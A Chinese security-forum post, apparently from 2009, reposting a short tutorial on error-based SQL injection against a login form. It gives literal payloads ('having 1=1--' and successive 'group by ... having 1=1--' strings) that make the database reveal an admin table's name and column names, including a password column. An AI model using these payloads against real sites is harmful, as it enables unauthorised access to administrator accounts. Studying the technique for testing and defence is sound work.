找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 php注入语句的判断
返回列表 发新帖
查看: 900|回复: 0

php注入语句的判断

[复制链接]
fuchou-angle

735

主题

1102

回帖

3076

牛毛

二级牛人

积分
3096
QQ
发表于 2009-7-8 08:22:56 | 显示全部楼层 |阅读模式 来自 山东省威海市
php注入语句的判断
作者: lost
网站: lost.cq.cn
尊重别人,尊重自己,请不要因为区区的一篇小文而践踏自己的人格,谢谢您们的支持、理解和合作!
如果这个注入点原来的SQL语句是:"select * from FK_admin where x_name='"&username&"'"
我们可以在用户名提交的地方填zerosoul' having 1=1--
整个SQL语句就变成了select * from FK_admin where x_name='zerosoul' having 1=1--'
返回结果如下图,可以把爆出FK_admin和第一个列名id爆出来:
接着提交zerosoul' group by id having 1=1--,爆出第二个列名x_pass,
再提交zerosoul' group by id,x_name having 1=1--,爆出第三个列名x_pass
判断, 语句
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 11:16 , Processed in 0.161656 second(s), 35 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表